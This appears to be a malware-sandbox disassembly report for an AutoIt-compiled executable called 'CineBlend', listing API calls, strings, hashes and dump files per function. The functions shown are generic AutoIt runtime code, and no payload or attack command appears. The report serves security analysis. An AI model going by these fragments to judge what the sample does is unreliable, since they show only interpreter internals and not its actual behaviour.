Instruction ID: e9a41da10b48f0acddbc158ecaa40a8af04d404a92e9248363ceb55f0d80c7a1
Opcode Fuzzy Hash: 3fff9e90d93e477a39aba9c1f86bb2f825f509a4441e382e78b7c6486b2f0413
Instruction Fuzzy Hash: 96A1966984A2C4CFC715DB687C453ED7FDCBB27300B88D4DAD4A0A3232D6294568DB32

Function 00B4338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00B43368,?), ref: 00B433BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00B43368,?), ref: 00B433CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00C12418,00C12400,?,?,?,?,?,?,00B43368,?), ref: 00B4343A

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

Part of subcall function 00B4425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B43462,00C12418,?,?,?,?,?,?,?,00B43368,?), ref: 00B442A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00C12418,?,?,?,?,?,?,?,00B43368,?), ref: 00B434BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B83CB0
SetCurrentDirectoryW.KERNEL32(?,00C12418,?,?,?,?,?,?,?,00B43368,?), ref: 00B83CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C031F4,00C12418,?,?,?,?,?,?,?,00B43368), ref: 00B83D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00B83D81

Part of subcall function 00B434D3: GetSysColorBrush.USER32(0000000F), ref: 00B434DE
Part of subcall function 00B434D3: LoadCursorW.USER32(00000000,00007F00), ref: 00B434ED
Part of subcall function 00B434D3: LoadIconW.USER32(00000063), ref: 00B43503
Part of subcall function 00B434D3: LoadIconW.USER32(000000A4), ref: 00B43515
Part of subcall function 00B434D3: LoadIconW.USER32(000000A2), ref: 00B43527
Part of subcall function 00B434D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B4353F
Part of subcall function 00B434D3: RegisterClassExW.USER32(?), ref: 00B43590

Part of subcall function 00B435B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B435E1
Part of subcall function 00B435B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B43602
Part of subcall function 00B435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00B43368,?), ref: 00B43616
Part of subcall function 00B435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00B43368,?), ref: 00B4361F

Part of subcall function 00B4396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B43A3C

Strings

AutoIt, xrefs: 00B83CA5
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B83CAA
runas, xrefs: 00B83D75

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: e7139af6d248eeb25a735a6b3813409fbdd4e127425d910e9fd5f30167ad1ed8
Instruction ID: 72ee5658b98907b4fadfaf072cf447732cdb8d77133fb89fc134b47ce6bcfa85
Opcode Fuzzy Hash: e7139af6d248eeb25a735a6b3813409fbdd4e127425d910e9fd5f30167ad1ed8
Instruction Fuzzy Hash: 8751F570148340AAD701FF60DC51EEEBBF8EF96B04F0444A9F191521B2DB248B99EB22

Function 00BADD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00BADDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00BADDBA
Process32NextW.KERNEL32(00000000,?), ref: 00BADDDA
CloseHandle.KERNELBASE(00000000), ref: 00BADE87

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 7a9d406cc754ca693bdd9a810f88c36db7f9da25813c78d5cb797ef7b9089462
Instruction ID: f9a2d9d5aa64414577b8ce87dff538a08421b70cb76e8f563eb60278de51c486
Opcode Fuzzy Hash: 7a9d406cc754ca693bdd9a810f88c36db7f9da25813c78d5cb797ef7b9089462
Instruction Fuzzy Hash: F93181711083019FD710EF60C885AAFBBE8EF95350F0409ADF586871A1EB71DA49CB92

Function 00B65058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00B6502E,00000003,00C098D8,0000000C,00B65185,00000003,00000002,00000000,?,00B72C59,00000003), ref: 00B65079
TerminateProcess.KERNEL32(00000000,?,00B6502E,00000003,00C098D8,0000000C,00B65185,00000003,00000002,00000000,?,00B72C59,00000003), ref: 00B65080
ExitProcess.KERNEL32 ref: 00B65092

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5d46f7ed7ee81d7d84696f7fc30bf54374281c5f6380c9dadee6500fa0146af0
Instruction ID: 7661ff90e312ba3327671da8ddd095061a97c542aa781c0a3e85b0171a6a5a73
Opcode Fuzzy Hash: 5d46f7ed7ee81d7d84696f7fc30bf54374281c5f6380c9dadee6500fa0146af0
Instruction Fuzzy Hash: 3EE04631002508AFCF216F54CD08E887BA9EB10391F004054F8899B121EB39DD52CAC0

Function 00B4EE50 Relevance: 21.6, APIs: 14, Instructions: 612windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00B4EF07
timeGetTime.WINMM ref: 00B4F107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B4F228
TranslateMessage.USER32(?), ref: 00B4F27B
DispatchMessageW.USER32(?), ref: 00B4F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B4F29F
Sleep.KERNEL32(0000000A), ref: 00B4F2B1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: dbe083418ab04bc36ddb32f910a3f361c51ebbdf2b94648a50f23c551a5d98fb
Instruction ID: cb926f3fbcb9c3791549b7af4fea6e7a838f1c0e528a75acecbbf58e4026076e
Opcode Fuzzy Hash: dbe083418ab04bc36ddb32f910a3f361c51ebbdf2b94648a50f23c551a5d98fb
Instruction Fuzzy Hash: 2432D230604242EFEB28CF24C884FBABBE5FF81304F1445AAF56597291D771EA45DB92

Function 00B43624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B43657
RegisterClassExW.USER32(00000030), ref: 00B43681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B43692
InitCommonControlsEx.COMCTL32(?), ref: 00B436AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B436BF
LoadIconW.USER32(000000A9), ref: 00B436D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B436E4

Strings

+, xrefs: 00B43640
AutoIt v3 GUI, xrefs: 00B43673
TaskbarCreated, xrefs: 00B43687
0, xrefs: 00B43639

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5c9215f6575ecd77ad305fa2f75a72305ff8290a35d2e8f2e982443ff9c53364
Instruction ID: 14677a05e34248b08be9d5b6e6cab058ae21f981e57a5b9ce547aaed94d7c1b1
Opcode Fuzzy Hash: 5c9215f6575ecd77ad305fa2f75a72305ff8290a35d2e8f2e982443ff9c53364
Instruction Fuzzy Hash: FD21E5B5D02208AFDB00DFA8EC89BDDBBB8FB09710F00811AF651A72A0E7B445508F90

Function 00B809DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B8071A: CreateFileW.KERNELBASE(00000000,00000000,?,00B80A84,?,?,00000000,?,00B80A84,00000000,0000000C), ref: 00B80737

GetLastError.KERNEL32 ref: 00B80AEF
__dosmaperr.LIBCMT ref: 00B80AF6
GetFileType.KERNELBASE(00000000), ref: 00B80B02
GetLastError.KERNEL32 ref: 00B80B0C
__dosmaperr.LIBCMT ref: 00B80B15
CloseHandle.KERNEL32(00000000), ref: 00B80B35
CloseHandle.KERNEL32(?), ref: 00B80C7F
GetLastError.KERNEL32 ref: 00B80CB1
__dosmaperr.LIBCMT ref: 00B80CB8

Strings

H, xrefs: 00B80C3D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 647f954d03d489c4a8dbeb223deb11fad76cb5c3620d93b24a79cf89992db0d9
Instruction ID: 170050ea7c270d25550c92942e44f0a6abbdc69b6213bb3d288df4ed72004d5f
Opcode Fuzzy Hash: 647f954d03d489c4a8dbeb223deb11fad76cb5c3620d93b24a79cf89992db0d9
Instruction Fuzzy Hash: 81A12632A241098FDF19FF68D892BAD7BE0EB06324F144199F811DB2E1DB359D16CB51

Function 00B452A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B45594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00B455B2

Part of subcall function 00B45238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B4525A

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B453C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B84BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B84C3E
RegCloseKey.ADVAPI32(?), ref: 00B84C80
_wcslen.LIBCMT ref: 00B84CE7
_wcslen.LIBCMT ref: 00B84CF6

Strings

Include, xrefs: 00B84BF4, 00B84C35
\Include\, xrefs: 00B45381
Software\AutoIt v3\AutoIt, xrefs: 00B453BA
\, xrefs: 00B84CFC

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 283fe5dffd3fc1c65068ebcf2726e92ed8190c9200276a12941acd184e42064b
Instruction ID: 0e4bd1a87e15c9d4a5c725e0d9823f7bb361c2d35b56eb88247477b129c7aa4c
Opcode Fuzzy Hash: 283fe5dffd3fc1c65068ebcf2726e92ed8190c9200276a12941acd184e42064b
Instruction Fuzzy Hash: 2D71AD715053419BC704EF25DC81AAEBBE8FF9A344F8044AEF191932B0EB71DA49CB56

Function 00B434D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B434DE
LoadCursorW.USER32(00000000,00007F00), ref: 00B434ED
LoadIconW.USER32(00000063), ref: 00B43503
LoadIconW.USER32(000000A4), ref: 00B43515
LoadIconW.USER32(000000A2), ref: 00B43527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B4353F
RegisterClassExW.USER32(?), ref: 00B43590

Part of subcall function 00B43624: GetSysColorBrush.USER32(0000000F), ref: 00B43657
Part of subcall function 00B43624: RegisterClassExW.USER32(00000030), ref: 00B43681
Part of subcall function 00B43624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B43692
Part of subcall function 00B43624: InitCommonControlsEx.COMCTL32(?), ref: 00B436AF
Part of subcall function 00B43624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B436BF
Part of subcall function 00B43624: LoadIconW.USER32(000000A9), ref: 00B436D5
Part of subcall function 00B43624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B436E4

Strings

AutoIt v3, xrefs: 00B4357F
#, xrefs: 00B43566
0, xrefs: 00B4355F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d2a14cd99298bd6dea25daf8113b393e4c21d000f87e16ecb40bed9ebf1eca51
Instruction ID: 6470abc1206e8496392a7f694cdd2e9f33fe7fc5dd3179918d64ca56ee1d6596
Opcode Fuzzy Hash: d2a14cd99298bd6dea25daf8113b393e4c21d000f87e16ecb40bed9ebf1eca51
Instruction Fuzzy Hash: 7B213D79E00314ABDB109FA5EC55BEDBFF8FB09B50F44801AE614A72B0D7B909548F90

Function 00B4370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B43709,?,?), ref: 00B43777
KillTimer.USER32(?,00000001,?,?,?,?,?,00B43709,?,?), ref: 00B437A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B437C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B43709,?,?), ref: 00B437D1
CreatePopupMenu.USER32 ref: 00B437E5
PostQuitMessage.USER32(00000000), ref: 00B43806

Strings

TaskbarCreated, xrefs: 00B437CC

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: d9bf1e6fa87cbd29a18d5758957af2ac04c08fd2771303e34e9445abc7238190
Instruction ID: ab9e9fa83cc25b71806273c090373ad1f19aebba158c9613c3fc1354878f71d9
Opcode Fuzzy Hash: d9bf1e6fa87cbd29a18d5758957af2ac04c08fd2771303e34e9445abc7238190
Instruction Fuzzy Hash: 844114F4200140BBDB142B2CCC99FBD7BE9F706F10F0881A5F582861A1DA789FA4B361

Function 00B42AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B42AF9
CoUninitialize.COMBASE ref: 00B42B98
UnregisterHotKey.USER32(?), ref: 00B42D7D
DestroyWindow.USER32(?), ref: 00B83A1B
FreeLibrary.KERNEL32(?), ref: 00B83A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B83AAD

Strings

close all, xrefs: 00B42AF4

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 014e0f81ac658e3191e7e0c676dc52de1757ad4afaf4b4d4b94120b47ae40b62
Instruction ID: 63c13456dd840ae6a018b2c3d370f624b58a8955140050fc3f1814917c8e5081
Opcode Fuzzy Hash: 014e0f81ac658e3191e7e0c676dc52de1757ad4afaf4b4d4b94120b47ae40b62
Instruction Fuzzy Hash: 89D159716012129FCB19EF14C895A69F7E4EF04B10F5542EEE94A6B261CB31AE12EF40

Function 00B790C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b2828bdc9db564b75252869c30804ffcc027543ccdba13e6ab738437734e5f
Instruction ID: c9db62f9f478e5e2e969d62290fbb7fa0fd3a56d10f277186c051aeb18ab2a3f
Opcode Fuzzy Hash: 63b2828bdc9db564b75252869c30804ffcc027543ccdba13e6ab738437734e5f
Instruction Fuzzy Hash: CFC1D271904249AFDF11DFA8D841BADBBF0FF0A310F1981D9E968A7392C7349942CB65

Function 00B5AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d5m0, xrefs: 00B5AE75
d1r0,2, xrefs: 00B5ACA9
d0b, xrefs: 00B5AC96, 00B5AD10, 00B5AEA7
d1b, xrefs: 00B5AD55, 00B5AE8E
d10m0, xrefs: 00B5ACF0
i, xrefs: 00B5B0A3

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: 68909768160ab5880e056c1398b6cd0919d682576ddbed8ce42fde03f3267689
Instruction ID: 43afafc5ddb9d471f2c18e5160d26b705b31d1c5a05daaba904e99eb9f85710b
Opcode Fuzzy Hash: 68909768160ab5880e056c1398b6cd0919d682576ddbed8ce42fde03f3267689
Instruction Fuzzy Hash: 2E6259755083418FCB24DF24C094AAAFBE1FF89304F1489AEE8999B351DB71D949CF92

Function 00B435B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B435E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B43602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00B43368,?), ref: 00B43616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00B43368,?), ref: 00B4361F

Strings

edit, xrefs: 00B435FC
AutoIt v3, xrefs: 00B435D9, 00B435DE, 00B435DF

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2e1b0348d53d5f627339acd3474a332ecbcfa7097ac419924128274815c6592d
Instruction ID: e62a79428c7e22af606da05c9b983463672d55c6b1a264c90b44ab137504a098
Opcode Fuzzy Hash: 2e1b0348d53d5f627339acd3474a332ecbcfa7097ac419924128274815c6592d
Instruction Fuzzy Hash: 50F05E79640295BAE73107136C08FBB7FBDE7C7F10F40805EBA14A7270D6694861DAB0

Function 00BB1196 Relevance: 9.1, APIs: 6, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00BB11B3
ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00BB11EE
EnterCriticalSection.KERNEL32(?), ref: 00BB120A
LeaveCriticalSection.KERNEL32(?), ref: 00BB1283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00BB129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB12C8

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
